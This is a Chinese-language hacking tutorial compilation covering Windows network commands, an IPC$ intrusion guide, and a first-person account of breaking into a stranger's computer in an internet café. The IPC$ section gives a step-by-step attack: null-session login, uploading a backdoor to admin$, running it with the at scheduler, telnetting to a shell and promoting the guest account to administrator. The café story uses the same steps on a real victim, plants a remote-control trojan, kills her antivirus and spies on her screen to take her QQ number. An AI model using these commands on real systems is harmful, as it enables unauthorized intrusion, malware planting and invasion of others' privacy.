黑客必学的六条系统命令

黑客必学的六条系统命令 这里我补充下，见笑了，呵呵，想学入侵，一定要知道cmd下的命令，如用ipc$入侵等，我发现有些人只知道黑客工具的使用，dos命令却一个都不知，其实适当的熟悉一些命令也无妨！ 如：刚装完系统，打开了默认共享，现在用dos命令建立一个批处理删除默认共享。如下： 先打开cmd窗口，输入 copy con killshare.bat net share c$ /del net share d$ /del net share e$ /del net share admin$ /del net share ipc$ /del (如果删除了这个共享，则局域网无法互相访问，请注意！) 以下是原文：----------------------------------------------------------- 一、ping命令 在Windows的控制窗口中（Windows 95/98/ME的command解释器、Windows NT/2000的cmd解释器），运行ping可以看到这个命令的说明，它是一个探测本地电脑和远程电脑之间信息传送速度的命令，这个命令需要TCP/IP协议的支持，ping将会计算一条信息从本地发送到远程再返回所需要的时间，黑客使用这个命令决定是否对服务器进行攻击，因为连接速度过慢会浪费时间、花费过多的上网费用。 另外这个命令还可以透过域名找到对方服务器的IP地址，我们知道域名只是提供给浏览网页用的，当我们看到一个不错的域名地址后，要想通过telnet连接它，就必须知道对方的IP地址，这里也要使用ping命令的。 这个命令的基本使用格式可以通过直接运行ping获得，现在假设目标是http://www.abc.com/，则可以在控制台下输入ping www.abc.com，经过等待会得到如下信息： Pinging www.abc.com [204.202.136.32] with 32 bytes of data: Reply from 204.202.136.32: bytes=32 time=302ms TTL=240 Reply from 204.202.136.32: bytes=32 time=357ms TTL=240 Reply from 204.202.136.32: bytes=32 time=288ms TTL=240 Reply from 204.202.136.32: bytes=32 time=274ms TTL=240 Ping statistics for 204.202.136.32: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 274ms, Maximum = 357ms, Average = 305ms 注意它的返回值来判断对方OS 这些信息的意思是：www.abc.com的IP地址是204.202.136.32，对他发送了四次数据包，数据包的大小是32字节，每一次返回的时间分别是302ms、357ms、288ms、274ms。综合看，发送了四个数据包全部返回，最小时间是274ms，最大时间357ms，他们的平均时间是305ms。 这样黑客就了解了连接对方服务器使用的时间。另外这个命令还有一些特殊的用法，例如可以通过IP地址反查服务器的NetBIOS名，现在以211.100.8.87为例，使用ping配合“-a”，在控制台下输入命令ping -a 211.100.8.87，它的返回结果是： Pinging POPNET-FBZ9JDFV [211.100.8.87] with 32 bytes of data: Reply from 211.100.8.87: bytes=32 time=96ms TTL=120 Reply from 211.100.8.87: bytes=32 time=110ms TTL=120 Reply from 211.100.8.87: bytes=32 time=110ms TTL=120 Reply from 211.100.8.87: bytes=32 time=109ms TTL=120 Ping statistics for 211.100.8.87: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 96ms, Maximum = 110ms, Average = 106ms 从这个结果会知道服务器的NetBIOS名称是POPNET-FBZ9JDFV。另外在一般情况下还可以通过ping对方让对方返回给你的TTL值大小，粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列，一般情况下Windows系列的系统返回的TTL值在100-130之间，而UNIX/Linux系列的系统返回的TTL值在240-255之间，例如上面的www.abc.com返回的TTL是240，对方的系统很可能是Linux，而第二个目标的TTL是120，那么说明它使用的系统也许是Windows。 另外ping还有很多灵活的应用，我不在这里过多的介绍，读者请另行查阅此命令相关帮助文件。 二、net命令： NET命令是很多网络命令的集合，在Windows ME/NT/2000内，很多网络功能都是以net命令为开始的，通过net help可以看到这些命令的详细介绍： NET CONFIG 显示系统网络设置 NET DIAG 运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息 NET HELP 显示帮助信息 NET INIT 不通过绑定来加载协议或网卡驱动 NET LOGOFF 断开连接的共享资源 NET LOGON 在WORKGROUP中登陆 NET PASSWORD 改变系统登陆密码 NET PRINT 显示或控制打印作业及打印队列 NET START 启动服务，或显示已启动服务的列表 NET STOP 停止网络服务 NET TIME 使计算机的时钟与另一台计算机或域的时间同步 NET USE 连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息 NET VER 显示局域网内正在使用的网络连接类型和信息 NET VIEW 显示域列表、计算机列表或指定计算机的共享资源列表 这些命令在Win95/98中支持的比较少，只有几个基本常见的，而在NT或者2000中又元元多于上面的介绍，不过大多数对于初学者也没有必要掌握，所以我选择了WindowsME进行介绍，其中最常用到的是NET VIEW和NET USE，通过者两个命令，学习者可以连接网络上开放了远程共享的系统，并且获得资料。这种远程共享本来是为便捷操作设计的，但是很多网络管理员忽视了它的安全性，所以造成了很多不应该共享的信息的暴露，对于学习者来说，则可以轻易获得它人电脑上的隐私资料。 例如在控制台下输入net view //202.96.50.24则可以获得对应IP的系统共享目录，进而找到他们的共享文件，当然这需要202.96.50.24系统的确存在共享目录，具体如何找到这些存在共享的系统，我将会在后面的文章中进行介绍。 三、telnet和ftp命令： 这两个命令分别可以远程对系统进行telnet登陆和ftp登陆，两种登陆使用的不同的协议，分别属于两种不同的网络服务，ftp是远程文件共享服务，也就是说学习者可以将自己的资料上传、下载，但是它并没有过多的权利，无法在远程电脑上执行上传的文件；而telnet则属于远程登陆服务，也就是说可以登陆到远程系统上，并获得一个解释器权限，拥有解释器就意味着拥有了一定的权限，这种权限可能是基本的文件操作、也可能是可以控制系统的管理员权限。 ============================================================= 四、netstat命令： 这个程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息，如采用的协议类型、当前主机与远端相连主机（一个或多个）的IP地址以及它们之间的连接状态等。 使用netstat ？可以显示它的命令格式和参数说明： netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 其中的参数说明如下： -a 显示所有主机的端口号； -e 显示以太网统计信息； -n 以数字表格形式显示地址和端口； -p proto 显示特定的协议的具体使用信息； -r 显示本机路由表的内容； -s 显示每个协议的使用状态（包括TCP、UDP、IP）； interval 重新显示所选的状态，每次显示之间的间隔数（单位秒）。 netstat命令的主要用途是检测本地系统开放的端口，这样做可以了解自己的系统开放了什么服务、还可以初步推断系统是否存在木马，因为常见的网络服务开放的默认端口轻易不会被木马占用，例如：用于FTP（文件传输协议）的端口是21；用于TELNET（远程登录协议）的端口是23；用于SMTP（邮件传输协议）的端口是25；用于DNS（域名服务，即域名与IP之间的转换）的端口是53；用于HTTP（超文本传输协议）的端口是80；用于POP3（电子邮件的一种接收协议）的端口是110；WINDOWS中开放的端口是139，除此以外，如果系统中还有其他陌生的到口，就可能是木马程序使用的了。通过netstat或者netstat -a可以观察开放的端口，如果发现下面的端口，就说明已经有木马程序在系统中存在： 31337号端口是BackOffice木马的默认端口；1999是Yai木马程序；2140或者3150都是DEEP THROAT木马使用的端口；还有NETBUS、冰河或者SUB7等木马程序都可以自定义端口，因此发现了陌生端口一定要提高警惕，使用防火墙或者查病毒软件进行检测。 五、tracert命令： 这个命令的功能是判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。tracert命令的格式如下： tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name 命令行中的参数-d是要求tracert不对主机名进行解析，-h是指定搜索到目的地址的最大轮数，-j的功能是沿着主机列表释放源路由，-w用来设置超时时间间隔。 通过tracert可以判断一个服务器是属于国内还是国际（网络服务器的物理未知不能依*域名进行判断），根据路由路经可以判断信息从自己的系统发送到网络上，先后经过了哪些IP到大对方服务器，这就好像乘公共汽车的时候从起点出发到达终点站的时候，中途会出现很多路牌一个道理，我们清楚了自己的信息的传送路径，才能够更清晰的了解网络、对服务器进行攻击。 六、winipcfg： winipcfg和ipconfig都是用来显示主机内IP协议的配置信息。只是winipcfg适用于Windows 95/98，而ipconfig适用于Windows NT。winipcfg不使用参数，直接运行它，它就会采用Windows窗口的形式显示具体信息。这些信息包括：网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等，点击其中的“其他信息”，还可以查看主机的相关信息如：主机名、DNS服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。 ipconfig的命令格式如下：ipconfig [/? | /all | /release [adapter] | /renew [adapter]] 其中的参数说明如下： 使用不带参数的ipconfig命令可以得到以下信息：IP地址、子网掩码、默认网关。而使用ipconfig /? 显示ipconfig的格式和参数的英文说明； /all 显示所有的配置信息； /release 为指定的适配器（或全部适配器）释放IP地址（只适用于DHCP）； /renew 为指定的适配器（或全部适配器）更新IP地址（只适用于DHCP）。 /all，则可以得到更多的信息：主机名、DNS服务器、节点类型、网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等。 ============================================================ ipc$入侵与防范 一 前言 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑。 二 什么是ipc$  IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。  利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。  我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$......)和系统目录winnt或windows(admin$)。  所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。 解惑:  1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。  也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)  2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接  3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表  三 建立ipc$连接在hack攻击中的作用  就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!  (基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)  不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(  因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接。 所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在。 四 ipc$与空连接,139,445端口,默认共享的关系  以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)  1)ipc$与空连接:  不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了。  许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟)。  2)ipc$与139,445端口:  ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的。  3)ipc$与默认共享  默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$......)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)  五 ipc$连接失败的原因  以下5个原因是比较常见的:  1)你的系统不是NT或以上操作系统;  2)对方没有打开ipc$默认共享  3)对方未开启139或445端口(惑被防火墙屏蔽)  4)你的命令输入有误(比如缺少了空格等)  5)用户名或密码错误(空连接当然无所谓了)  另外,你也可以根据返回的错误号分析原因：  错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；  错误号51，Windows 无法找到网络路径 : 网络有问题；  错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动； 目标有防火墙（端口过滤）；  错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$； 错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。  错误号1326，未知的用户名或错误密码 ： 原因很明显了；  错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）  错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。 关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就*大家自己体会和试验了。  六如何打开目标的IPC$(此段引自相关文章)  首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。 七如何防范ipc$入侵  1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)  首先运行regedit，找到如下组建 [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)  2禁止默认共享  1）察看本地共享资源  运行-cmd-输入net share  2）删除共享(每次输入一个）  net share ipc$ /delete  net share admin$ /delete  net share c$ /delete  net share d$ /delete（如果有e,f,......可以继续删除）  3）停止server服务  net stop server /y （重新启动后server服务会重新开启）  4）修改注册表  运行-regedit  server版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareServer（DWORD）的键值改为:00000000。  pro版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareWks（DWORD）的键值改为:00000000。  如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。  3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务  控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用  4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师  5设置复杂密码，防止通过ipc$穷举密码  八 相关命令  1)建立空连接:  net use //IP/ipc$ "" /user:""(一定要注意:这一行命令中包含了3个空格)  2)建立非空连接:  net use //IP/ipc$ "用户名" /user:"密码" (同样有3个空格)  3)映射默认共享:  net use z: //IP/c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)  如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: //IP/c$  4)删除一个ipc$连接  net use //IP/ipc$ /del  5)删除共享映射  net use c: /del 删除映射的c盘，其他盘类推  net use * /del 删除全部,会有提示要求按y确认  九 经典入侵模式  这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)  1. C:/>net use //127.0.0.1/IPC$ "" /user:"admintitrators"  这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。  2. C:/>copy srv.exe //127.0.0.1/admin$  先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:/winnt/system32/，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。  3. C:/>net time //127.0.0.1  查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。  4. C:/>at //127.0.0.1 11:05 srv.exe  用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）  5. C:/>net time //127.0.0.1  再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。  6. C:/>telnet 127.0.0.1 99  这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。  虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了  7.C:/>copy ntlm.exe //127.0.0.1/admin$  用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。  8. C:/WINNT/system32>ntlm  输入ntlm启动（这里的C:/WINNT/system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！  9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)  为了以防万一,我们再把guest激活加到管理组  10. C:/>net user guest /active:yes  将对方的Guest用户激活  11. C:/>net user guest 1234  将Guest的密码改为1234,或者你要设定的密码  12. C:/>net localgroup administrators guest /add  将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)  十 总结:  关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论。 ================================================================ 网吧入侵全攻略 好久都没来网吧了.今天一朋友来找我.外面有下着雪.实在没地方玩.又给溜进了网吧...  在以前家里没买电脑时.整天都泡这网吧..所以对他的系统设置什么还了解点.都大半年没来了...不知道有啥变化..  这网吧还不错.别的网吧都是无盘的或者就是98的.这里98和2000都有..呵...搞入侵可方便了....  无意的看到13号坐着两MM...嘻....入侵也由此开始了.看能不能拿到MM的QQ号.....偶也找了一2000系统的机器做下..(偶找了一角落.呵.这样比较安全点..)  打开偶可爱的CMD..先net name下看看本机情况  WANGLU05  USER2000  命令成功完成。  我本机名是WANGLU05.ping下看看IP有无什么规则  Pinging wanglu05 [192.168.0.13] with 32 bytes of data:  Reply from 192.168.0.13: bytes=32 timenet use //192.168.0.225/ipc$ "" /user:"user04"  命令成功完成。 网吧系统盘为G盘.接着映射对方G盘为我本地Z盘.  G:/>net use z: //192.168.0.225/g$  命令成功完成。  现在我的电脑里多了一个Z盘...图3. 现在我们在这个Z盘里新建或删除文件.也就等于在192.168.0.225这个机器上操作了...  这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏....  下面来copy一个木马客户端上去先...由于只是看QQ而已...所以我找了一个  web控制台.体积没多大,205KB..下面是关于webserver的介绍./../  web控制台 （本站不提供此类工具下载） 一个直接在IE栏里输入对方IP就可以控制对方机器的小软件，也就是所谓的B/S模式的控制。用起来很方便，对方运行了服务端后，你在IE栏里直接输入对方IP就可以控制了，也可以通过刷新来实现重复抓屏。  接着  G:/>copy webserver.exe //192.168.0.225/admin$  已复制 1 个文件。  G:/>net time //192.168.0.225  //192.168.0.225 的当前时间是 2005/2/5 下午 05:00  命令成功完成 G:/>at //192.168.0.225 17:02 webserver.exe  用AT命令启动webserver.exe.  2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了...  FT....我说那.  难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下..  还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了...  打开控制面板--管理工具--计算机管理  操作-连接到另一计算机.  然后输入IP192.168.0.225  呵.等一会就可以看到成功了...你看到了什么?  更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务.  OK了...  本地打开一cmd  输入  G:/>telnet 192.168.0.225  回车后出现  Server allows NTLM authentication only  Server has closed connection  需要NTML认证的...用小榕的那个ntml.exe就可以解决这一问题.  ntlm.exe在《流光》的Tools目录中有的...  没工具怎么办呢..  我们在本地添加一和远程主机同样的用户名  输入  net user user04 /add 添加user04密码为空的用户  net localgroup administrators user04 /add 把user04加入管理员组  然后来到G:/Winnt/system32下找到CMD.exe  右击.创建快捷方式.然后在快捷方式 CMD右击..属性.  在以其他用户身份运行前打勾...  然后运行  快捷方式 CMD  弹出窗口.在用户名处输入user04密码为空 然后  telnet 192.168.0.225  回车..哈哈...拿到shell了....  接下来的事就好办了...去黑基down了一个knlps 命令行下杀进程的东东  copy上去././然后telnet上去.在CMD下执行...杀掉了瑞星的进程  这下把瑞星给关了.还怕他提示有毒  接着执行webserver.exe  在IE里输入  192.168.0.225  看到了.挖卡卡..开心...点那个查看屏幕..呵..MM正在聊天...  好了她的QQ号码也拿到手了..加了她去聊聊去....